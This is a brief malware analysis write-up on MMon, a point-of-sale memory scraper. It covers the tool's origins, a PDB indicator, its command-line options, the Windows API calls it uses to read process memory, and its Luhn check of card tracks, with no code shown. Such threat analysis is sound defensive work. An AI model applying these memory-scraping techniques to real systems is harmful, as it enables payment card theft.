Introduction

This family is around since 2010 and according to a Visa report (September 2020) this malware was used in an intrusion of a North American merchant. Visa also states that the code of MMon has been used as a base for multiple point-of-sale (POS) malware families, such as: JavalinPOS, BlackPOS, POSRAM and more.

MMon Analysis

The PDB mmon.pdb is a good indicator to identify samples that are based on MMon.

image-20210301005949831

MMon supports a couple command line options. It can scan all processes or specific processes and it can scan for kartoxa (card data) and also for specific patterns.

image-20210301010323487

To search within the process memory it use a combination of OpenProcess(), VirtualQueryEx(), ReadProcessMemory().

image-20210301011119684

image-20210301011200805

The tracks are validated with the Luhn algorithm.

image-20210301011535455

As seen below, MMon was able to find the tracks within the notepad process.

image-20210301011535455

Conclusion

MMon is basically a simple command line tool to find credit card data and other patterns within process memory.